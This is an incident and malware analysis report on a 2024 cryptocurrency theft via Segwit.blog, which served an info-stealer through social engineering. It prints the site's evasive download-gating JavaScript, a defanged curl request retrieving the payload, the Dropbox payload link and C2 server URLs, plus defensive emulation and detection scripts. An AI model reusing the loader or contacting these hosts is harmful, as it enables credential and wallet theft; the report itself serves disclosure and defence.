# Cryptocurrency Theft: Segwit.blog

> **Overview**:
> An individual fell victim to a sophisticated cyber scam involving social engineering and malware, orchestrated through a compromised social media account. The attacker deceived the victim into downloading and executing a malicious file, purportedly for project collaboration, which led to unauthorized access and the theft of cryptocurrency assets. The total value stolen amounted to approximately 7.26 Ethereum, equivalent to around $28,174.80 USD at the time of the theft.

| **Subject** | **Detail** |
|:--- | --- |
| Event date and time | `Mar-06-2024 07:09:06 PM +UTC` |
| Website delivering the malicious payload, and the payload itself | `Segwit.blog` served `Segwit.exe` |
| `segwit.blog` website snapshot | [Link](https://urlscan.io/result/73ce9a5a-1824-45ad-bda1-fa866f6b5c2e/) |

Report TLP Classification: Clear

#### Case Relevant Cryptocurrency Addresses

| **Label** | **Cryptocurrency Address** |
|:--- | --- |
| **Scammer Wallet Address** | 0x5959424246a971d115dd2394c9fcfb9e1b7df54e |
| **Victim Wallet Address 1** | 0x311a1e4244a134fe0efd64cdf2e66203fd6e1c81 |
| **Victim Wallet Address 2** | 0xfcae090af3dfd6f4eca847aac286c800ba8e70cc |

## Events Prior to Theft

[ As Reported By [Intelligence On Chain](https://intelligenceonchain.com/) ]

On March 6, 2024, `Victim alias: Redacted` was on the social media platform formerly known as Twitter, now "X", when he was contacted by the user @BowFr0g, a non-fungible token artist with whom the victim was familiar and had interacted and conversed a number of times in the past via Twitter Spaces and direct messages. @BowFr0g was someone the victim had grown to trust.
Unbeknownst to `Victim alias: Redacted`, the Twitter account belonging to `@BowFr0g` had been compromised the day prior. The user purporting to be `@BowFr0g` suggested that `Victim alias: Redacted` might be able to help them with the phrasing, advertising, and ask-me-anything (AMA) duties for the project they were working on, in the form of a kind of live publicity event. However, the actual account owner later reached out to a mutual associate via phone call and confirmed that `@BowFr0g` had been compromised.

Effectively, `Victim alias: Redacted` was socially engineered by the malicious actor into visiting the website `Segwit.blog` and downloading the executable `Segwit.exe`. Both were scanned via VirusTotal, and no malware signatures were detected. Consequently, the victim proceeded to run the file on their personal computer. This action triggered execution of the malicious payload, leading to the unauthorized withdrawal of the victim's funds. Analysis of the malicious executables retrieved from the compromised machine found file hash signatures correlating with a combination of the malware families "Rhadamanthys" and "Stealc", both of which are known to be used as info-stealers. The malware retrieved the private keys of `Victim alias: Redacted`'s cryptocurrency wallets and withdrew assets amounting to approximately 7.26 Ethereum (valued at roughly $28,174.80 USD at the time) via the Arbitrum network.

After the successful theft, the malicious actor in possession of the `@BowFr0g` account deleted the conversation, blocked the victim, and began moving the assets for prompt withdrawal and transfer through the Orbiter bridge. The funds were transferred to a number of additional addresses but ultimately arrived at MEXC for routing through the decentralized exchange.
Multiple IC3 reports have been filed, and the relevant cryptocurrency exchange, MEXC, was emailed regarding the provenance of the funds. MEXC kindly reported having frozen the assets (as of the evening of March 8, 2024, for a time not to exceed 48 hours), provided that law enforcement sent the exchange official notice of an investigation.

### Transaction Analysis

- Documented below is the malicious actor's address `0x5959424246a971d115dd2394c9fcfb9e1b7df54e` on the Arbitrum blockchain bridging the stolen assets to the Ethereum chain through [Orbiter Finance](https://www.orbiter.finance).
- Transaction visualization below:

```mermaid
flowchart TB
    subgraph transaction
        id1[0x0dd5159d47253c4d81985f0a96945de62834a2decbad082107058fbecb065101]
        click id1 "https://app.dedaub.com/arbitrum/tx/0x0dd5159d47253c4d81985f0a96945de62834a2decbad082107058fbecb065101" "0x0dd5159d47253c4d81985f0a96945de62834a2decbad082107058fbecb065101"
        subgraph Sender
            s_address["Address: 0x5959424246a971d115dd2394c9fcfb9e1b7df54e"]
            click s_address "https://app.dedaub.com/arbitrum/address/0x5959424246a971d115dd2394c9fcfb9e1b7df54e/overview" "0x5959424246a971d115dd2394c9fcfb9e1b7df54e"
        end
        id2[transfer: 7.2575 Ethereum]
        subgraph Recipient
            r_address["Address: 0x80c67432656d59144ceff962e8faf8926599bcf8"]
            click r_address "https://app.dedaub.com/arbitrum/address/0x80c67432656d59144ceff962e8faf8926599bcf8/overview" "0x80c67432656d59144ceff962e8faf8926599bcf8"
        end
    end
    subgraph "Transaction Data"
        evt_data["Date: 2024-03-06 | Chain: ARB"]
    end
    s_address --> id2 --> r_address
```

## Associated Transactions

### Direct Associations

Instance-relevant cryptocurrency theft transaction hashes were collected for the two victim addresses on Arbitrum, `0x311A1e4244A134FE0efD64cdF2E66203fd6E1C81` and `0xFcaE090AF3Dfd6f4eCA847aAC286c800BA8e70Cc`.

### Associated Cryptocurrency Exchange Deposit Addresses

| **Chain** | **Address** | **Label** | **Link** |
| --- | --- | --- | --- |
| Ethereum | 0x4afd85bb51904765f2482ba59ff6849b3783f988 | mexc_deposit_eth_0x4afd85bb519 | <https://app.dedaub.com/ethereum/address/0x4afd85bb51904765f2482ba59ff6849b3783f988/overview> |
| Ethereum | 0x4a2cd0cce873aa5a67599d4842a2ac597ed6c0ff | mexc_deposit_eth_0x4a2cd0cce87 | <https://app.dedaub.com/ethereum/address/0x4a2cd0cce873aa5a67599d4842a2ac597ed6c0ff/overview> |
| Ethereum | 0x2f41146d6ead97daa2733f61a590982305d9113e | okx_deposit_eth_0x2f41146d6ead | <https://app.dedaub.com/ethereum/address/0x2f41146d6ead97daa2733f61a590982305d9113e/overview> |

## Technical Analysis

From the victim's browser activity and file downloads, interactions with `Segwit.blog` and `Segwit.exe` were confirmed. The relevant source code of `Segwit.blog` has therefore been analyzed, stored, and cataloged for further analysis if needed. The following section elaborates on the analysis conducted on `Segwit.blog`.

**Preface:** The primary function of `Segwit.blog` is to serve as a social engineering agent and as a malware payload delivery system.

**Analysis Environment Configuration:** Analysis of `Segwit.blog` was conducted at 11:30 PM EST on March 7th, 2024, using a browserling.com virtual instance in a Windows 10 configuration running Google Chrome version 119.

![Segwit_blog_frontend](https://urlscan.io/screenshots/73ce9a5a-1824-45ad-bda1-fa866f6b5c2e.png =600x400)
`Segwit.blog` Frontend

The image above was captured from the `Segwit.blog` instance on the same day the funds were stolen from the victim. As can be observed, the instance clearly depicts an **"open"**, inviting **"web3 community"** environment. At a cursory glance the instance does not appear malicious; if anything, quite the contrary: all users need to do is provide a wallet address, sign up, and then, logically, install `Segwit Setup.exe`. The issue is that the website has been intentionally designed to deceive users and evade detection. How this was accomplished through the file named `7011-d483282552489351.js` is documented below.
### 7011-d483282552489351.js

<div style="display: flex; justify-content: space-between;">
<div align="left" style="width: 30%;">

```mermaid
flowchart TB
    start[start]
    checkAvailable[Check window.available<br><sub>Line: 10</sub>]
    checkBrowser[Check browser agent<br><sub>Lines: 3-9</sub>]
    osCheck[Check if Mac or Windows<br><sub>Line: 14</sub>]
    makePostRequest[Make API POST Request<br><sub>Lines: 14-18</sub>]
    handleError[Handle Error<br><sub>Lines: 19-22, 30-32</sub>]
    handleApiResponse[Handle API Response<br><sub>Line: 24</sub>]
    createIframe[Create and Load Iframe<br><sub>Lines: 25-28</sub>]
    setTrueState[Set True State<br><sub>Line: 29</sub>]
    showAlert[Show Alert<br><sub>Line: 11</sub>]
    start --> checkAvailable
    checkAvailable -->|false| checkBrowser
    checkAvailable -->|true| showAlert
    checkBrowser -->|Mobile| showAlert
    checkBrowser -->|Desktop| osCheck
    osCheck --> makePostRequest
    makePostRequest -->|Success| handleApiResponse --> createIframe --> setTrueState
    makePostRequest -->|Fail| handleError
```

</div>
<div align="right" style="width: 70%; font-size: 12px;">

```javascript=
u = async (e) => {
    try {
        const test = function () {
            let check = false;
            (function (a) {
                if (/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino|android|ipad|playbook|silk/i.test(a) || /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0, 4))) check = true;
            })(navigator.userAgent || navigator.vendor || window.opera);
            return check;
        };
        if (window.available === false || test()) {
            alert('Download is not available for your browser!');
            return;
        }
        let t = await fetch(`/api/sign-up?system=${window.isMac ? 'mac' : 'win'}&key=${window.__id}`, {
            method: "POST",
            headers: { "Content-Type": "application/json" },
            body: JSON.stringify(e),
        });
        if (!t.ok) {
            let { error: e } = await t.json();
            throw Error(e.message);
        }
        debugger;
        let data = await t.json();
        var n = document.createElement("iframe");
        n.style.display = "none";
        n.src = data.data;
        document.body.appendChild(n);
        d(!0);
    } catch (e) {
        r.negative("Something went wrong. Please try again later."), console.error(e);
    }
}
```

</div>
</div>

### Code Explained

The script performs device detection, conditional execution, API interaction, and dynamic content loading within a web environment:

1. **Device Type Detection**: Identifies mobile devices via user agent analysis to tailor behavior.
2. **Conditional Execution**: Uses `window.available` and the device type to control flow, displaying an alert for incompatible devices and stopping further actions.
3. **API<sub>[^1]</sub> Interaction**: Makes a POST request to a sign-up API, including the system type (Mac/Windows) in the request. This differentiation can affect server responses.
4. **Dynamic iFrame<sub>[^2]</sub> Creation**: On a successful API response, creates an iframe element and loads content from the response into it. This step is key to seamlessly integrating additional content or scripts.
5. **Error Handling**: Implements try-catch for robust error management, providing generic failure notifications and logging errors for debugging.
6. **State Update**: Signals task completion or a state change within the application.

These operations, particularly device detection and dynamic content loading via iframes, are leveraged to evade signature-based detection by varying behavior based on the client's environment and discreetly executing additional code.
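To make the gating concrete, the following Node.js harness (an added example, not code from the original page or from the Segwit.blog script) re-implements the control flow of `u` with `fetch`, `alert`, `document` and `d` replaced by recording stubs and runs it against constructed client environments. The mobile pattern is a shortened stand-in for the full regular expression above, the environment names and the `scan.eth` address are constructed, and the payload URL returned by the stubbed API is a placeholder.

```javascript
// Added example: emulates the download gate in 7011-d483282552489351.js so an
// analyst can see which clients ever reach the /api/sign-up request (and so the
// stage-two URL) and which are turned away. Nothing here touches the network.

// Shortened stand-in for the site's mobile user-agent regex (assumption: the
// full pattern from the page is not needed to show the gating behaviour).
const MOBILE_RE = /(android|bb\d+|meego).+mobile|iemobile|ip(hone|od)|ipad|blackberry|opera m(ob|in)i|windows ce|mobile.+firefox/i;

// Placeholder for the Dropbox link the real API returned (see dropbox-response).
const STUB_PAYLOAD_URL = "https://<payload-host>/Segwit-Setup.exe";

// Runs the gate for one constructed client environment and returns what that
// client would have done. Order mirrors the original: the window.available check
// and the mobile test short-circuit before any request is made.
function emulateGate(env) {
  const trace = { alerted: false, request: null, iframeSrc: null, stateSet: false };

  // Recording stubs standing in for alert(), fetch(), document and d().
  const alert = () => { trace.alerted = true; };
  const fetchStub = (url, opts) => {
    trace.request = { url, method: opts.method, body: JSON.parse(opts.body) };
    return { ok: true, json: () => ({ resp: true, data: STUB_PAYLOAD_URL }) };
  };
  const documentStub = { body: { appendChild: (el) => { trace.iframeSrc = el.src; } } };
  const d = () => { trace.stateSet = true; };

  if (env.available === false || MOBILE_RE.test(env.userAgent)) {
    alert("Download is not available for your browser!");
    return trace;
  }
  const t = fetchStub(`/api/sign-up?system=${env.isMac ? "mac" : "win"}&key=${env.id}`, {
    method: "POST",
    headers: { "Content-Type": "application/json" },
    body: JSON.stringify({ ethAddress: env.ethAddress }),
  });
  if (!t.ok) return trace;
  const data = t.json();
  const n = { style: {}, src: data.data }; // stands in for document.createElement("iframe")
  n.style.display = "none";
  documentStub.body.appendChild(n);
  d(true);
  return trace;
}

// Constructed client environments; the first two resemble what a scanner with a
// mobile user agent, or one that sets window.available = false, would present.
const WIN_UA = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/119.0.0.0";
const ENVIRONMENTS = {
  mobile_iphone: { userAgent: "Mozilla/5.0 (iPhone; CPU iPhone OS 17_0 like Mac OS X) Mobile/15E148", available: undefined, isMac: false, id: null, ethAddress: "scan.eth" },
  desktop_available_false: { userAgent: WIN_UA, available: false, isMac: false, id: null, ethAddress: "scan.eth" },
  desktop_windows: { userAgent: WIN_UA, available: undefined, isMac: false, id: null, ethAddress: "bobjones.eth" },
  desktop_mac: { userAgent: "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/119.0.0.0", available: undefined, isMac: true, id: null, ethAddress: "bobjones.eth" },
};

// Runs every environment and returns the traces keyed by environment name.
function runAll() {
  const out = {};
  for (const [name, env] of Object.entries(ENVIRONMENTS)) out[name] = emulateGate(env);
  return out;
}

for (const [name, t] of Object.entries(runAll())) {
  console.log(name.padEnd(24), t.alerted ? "alert shown, no request" : `POST ${t.request.url} -> hidden iframe ${t.iframeSrc}`);
}
```

Only the two desktop environments ever produce the POST and the hidden iframe, which is why a sandbox that presents a mobile user agent, or a page state with `window.available === false`, never observes the stage-two URL.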
[^1]: [API definition and reference](https://www.ibm.com/topics/api)
[^2]: [iFrame definition and reference](https://developer.mozilla.org/en-US/docs/Web/HTML/Element/iframe)

### Payload Delivery

Executable Payload Delivered: `Segwit Setup.exe`

Signatures:

| **File** | **Algorithm** | **File Hash** |
|:--- | --- | --- |
| `SegwitSetup.exe` | **MD5** | `a22d71549d6b60c8c270503f585530ec` |
| `SegwitSetup.exe` | **SHA1** | `0cb40b824f878a46e7bd55498331f2b87ddd6b25` |
| `SegwitSetup.exe` | **SHA256** | `7c6543af2eea8ed933e0898bdbcfc642f0c11bece904b366ca939da9e76465eb` |
| `SegwitSetup.exe` | **SHA512** | `165feee79662d7e37ac9224e6063cea9c37925927aa71065bad9dfb4f44a281cd96fbe243591f1ea731106b5a3031e26f4afc1b164ce8abe9a0d8e4f8af7593a` |

The payload that `7011-d483282552489351.js` requests via the [POST request](#7011-d483282552489351[.]js/api/sign-up?system=win) is a Windows executable called `Segwit Setup.exe`. This was verified via a controlled, direct website interaction approximately six hours after the initial adverse event. The executable was stored on a [Dropbox account](#dropbox-response). The request was crafted to retrieve the payload while appearing as a benign file download to the user's device.
#### 7011-d483282552489351[.]js/api/sign-up?system=win

```curl
curl 'hxxps[://]segwit[.]blog/api/sign-up?system=win&key=null' \
  -H 'authority: segwit[.]blog' \
  -H 'accept: */*' \
  -H 'accept-language: en-US,en;q=0.9' \
  -H 'content-type: application/json' \
  -H 'origin: hxxps[://]segwit[.]blog' \
  -H 'referer: hxxps[://]segwit[.]blog/' \
  -H 'sec-ch-ua: "Google Chrome";v="119", "Chromium";v="119", "Not?A_Brand";v="24"' \
  -H 'sec-ch-ua-mobile: ?0' \
  -H 'sec-ch-ua-platform: "Windows"' \
  -H 'sec-fetch-dest: empty' \
  -H 'sec-fetch-mode: cors' \
  -H 'sec-fetch-site: same-origin' \
  -H 'user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119[.]0[.]0[.]0 Safari/537.36' \
  --data-raw '{"ethAddress":"bobjones[.]eth"}' \
  --compressed
```

#### dropbox-response

```json!
{
  "resp": true,
  "data": "hxxps[://]www[.]dropbox[.]com/scl/fi/5sbs7pzead0zqy4gi7r4s/Segwit-Setup[.]exe?rlkey=bill6374m4u45wz6qifxnl7de&dl=1"
}
```

## Malware Analysis

Through the successful quarantine of the malicious payload used against the victim, cursory network analysis could be conducted using Recorded Future's [Tria.ge](http://tria.ge/):

- [Segwit Setup.exe analysis iteration 1 via Tria.ge](https://tria.ge/240306-zavnnagg55/behavioral2)
- [Segwit Setup.exe analysis iteration 2 via Tria.ge](https://tria.ge/240310-jebtcafh2y)

Tria.ge's virtual machine was used to observe the behavior of the malicious sample in a controlled environment. It was also crucial for monitoring the network calls made by the sample and for validating file hash signatures, which were then used on VirusTotal to develop a more accurate determination that the malware used against the victim was a combination of the malware families Rhadamanthys and [Stealc](https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc).
Furthermore, from the network packet captures provided by Tria.ge, the network calls were analyzed in greater depth using Dynamite Lab ([packet analysis available here](https://lab.dynamite.ai/pcaps/8c5a887c-c71a-4069-9d30-1fa3a14ec897)) and Wireshark. Over numerous iterations it was concluded that the command and control (C2) server employed by the malware was at the destination IP address 193[.]163[.]7[.]129. This was further substantiated using data collected through [VirusTotal](#VirusTotal) for the `SegwitSetup` executable SHA256 file hash `7c6543af2eea8ed933e0898bdbcfc642f0c11bece904b366ca939da9e76465eb`.

![packet_analysis](https://hackmd.io/_uploads/SyLrJswR6.png)
Packet Analysis Research

#### VirusTotal

<iframe src="https://www.virustotal.com/graph/embed/gc6819d4939bf4632b603484761dd85a878474b32b9f94f8685735e98004e7371?theme=dark" width="1000" height="600"> </iframe>

Structural Pattern Observed via VirusTotal:

```csvpreview
type,id
url,hxxp[://]193[.]163[.]7[.]129/3fb765dac3e38c00/mozglue[.]dll
url,hxxp[://]193[.]163[.]7[.]129/3fb765dac3e38c00/msvcp140[.]dll
url,hxxp[://]193[.]163[.]7[.]129/3fb765dac3e38c00/freebl3[.]dll
url,hxxp[://]193[.]163[.]7[.]129/3fb765dac3e38c00/nss3[.]dll
url,hxxp[://]193[.]163[.]7[.]129/3fb765dac3e38c00/vcruntime140[.]dll
url,hxxp[://]193[.]163[.]7[.]129/3fb765dac3e38c00/softokn3[.]dll
url,hxxp[://]193[.]163[.]7[.]129/1d7bef10a75b8ff3[.]php
url,hxxp[://]193[.]163[.]7[.]129/3fb765dac3e38c00/sqlite3[.]dll
```

## Report Objectives

<aside>
💡 The objective of this report is to disclose in as much detail as possible the research, its respective findings, and the impacts incurred by the victim from the usage of this particular malware variant. The report has been composed to the best of our knowledge and capabilities, in the hope that law enforcement assists with potential asset recovery by freezing or withholding assets in transit through decentralized exchanges.
Moreover, we would greatly appreciate the assistance of law enforcement in engaging the exchanges MEXC and OKX.
</aside>

## Conclusion

Currently, based on the values transacted through the **Scammer Wallet Address** `0x5959424246a971d115dd2394c9fcfb9e1b7df54e`, the victim was subject to social engineering and malware-as-a-service.

## References

For a more comprehensive visual of the blockchain addresses interacted with, please refer to the graph below:

[`Victim alias: Redacted` | MetaSleuth](https://metasleuth.io/result/arbitrum/0x5959424246a971d115dd2394c9fcfb9e1b7df54e?source=58a45c98-61cd-49f1-b8ce-6dd075ea229c)
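Returning to the structural pattern observed via VirusTotal in the Malware Analysis section: the listed DLLs are the legitimate Mozilla NSS and SQLite libraries that Stealc-family stealers fetch from their C2 to read browser credential stores, so a host serving that set from one directory next to a `.php` endpoint is a usable hunting signature. The Python script below is an added example, not part of the original report or of any tool it mentions; it refangs defanged URLs and flags such staging directories over a constructed URL log that mixes the page's eight C2 entries with benign `example.*` traffic.

```python
"""Added example (not part of the original report): hunt a URL log for the
Stealc-style DLL staging pattern shown in the VirusTotal listing, i.e. one host
serving the NSS/SQLite DLL set from a single directory next to a .php endpoint.
The log below is constructed; the 193[.]163[.]7[.]129 rows are the page's own
defanged observations, the example.* rows are benign filler."""
import re
from collections import defaultdict
from posixpath import basename, dirname
from urllib.parse import urlparse

# Legitimate libraries that Stealc-family info-stealers fetch from their C2 to
# read Firefox/Chromium credential databases on the infected host.
STAGING_DLLS = {"nss3.dll", "freebl3.dll", "softokn3.dll", "mozglue.dll",
                "sqlite3.dll", "msvcp140.dll", "vcruntime140.dll"}


def refang(url: str) -> str:
    """Undo common defanging (hxxp, [://], [.]) so urlparse can read the URL."""
    url = re.sub(r"^hxxp", "http", url.strip(), flags=re.IGNORECASE)
    return url.replace("[://]", "://").replace("[.]", ".")


def find_dll_staging(lines, min_dlls: int = 3):
    """Group URLs by (host, directory); report directories serving at least
    `min_dlls` of STAGING_DLLS together with any .php endpoint on that host."""
    dll_dirs = defaultdict(set)   # (host, directory) -> DLL names seen there
    php_paths = defaultdict(set)  # host -> .php paths seen on that host
    for raw in lines:
        raw = raw.strip()
        if raw.startswith("url,"):        # csvpreview rows carry a type column
            raw = raw.split(",", 1)[1]
        parsed = urlparse(refang(raw))
        if not parsed.netloc:             # header line, blank line, junk
            continue
        name = basename(parsed.path).lower()
        if name in STAGING_DLLS:
            dll_dirs[(parsed.netloc, dirname(parsed.path))].add(name)
        elif name.endswith(".php"):
            php_paths[parsed.netloc].add(parsed.path)
    findings = []
    for (host, directory), seen in sorted(dll_dirs.items()):
        if len(seen) >= min_dlls:
            findings.append({"host": host, "directory": directory,
                             "dlls": sorted(seen), "php": sorted(php_paths[host])})
    return findings


# Constructed log in the csvpreview layout: the page's C2 rows plus benign rows
# (one lone DLL, one lone .php, one static asset) that must not be flagged.
SAMPLE_LOG = """\
type,id
url,hxxp[://]193[.]163[.]7[.]129/3fb765dac3e38c00/mozglue[.]dll
url,hxxp[://]193[.]163[.]7[.]129/3fb765dac3e38c00/msvcp140[.]dll
url,hxxp[://]193[.]163[.]7[.]129/3fb765dac3e38c00/freebl3[.]dll
url,hxxp[://]193[.]163[.]7[.]129/3fb765dac3e38c00/nss3[.]dll
url,hxxp[://]193[.]163[.]7[.]129/3fb765dac3e38c00/vcruntime140[.]dll
url,hxxp[://]193[.]163[.]7[.]129/3fb765dac3e38c00/softokn3[.]dll
url,hxxp[://]193[.]163[.]7[.]129/1d7bef10a75b8ff3[.]php
url,hxxp[://]193[.]163[.]7[.]129/3fb765dac3e38c00/sqlite3[.]dll
url,https://download.example.com/updates/vcruntime140.dll
url,https://cdn.example.com/app/index.php
url,https://www.example.org/static/app.js
"""

if __name__ == "__main__":
    for hit in find_dll_staging(SAMPLE_LOG.splitlines()):
        print(f"{hit['host']}{hit['directory']}: {len(hit['dlls'])} staging DLLs, "
              f"php endpoints {hit['php'] or 'none'}")
```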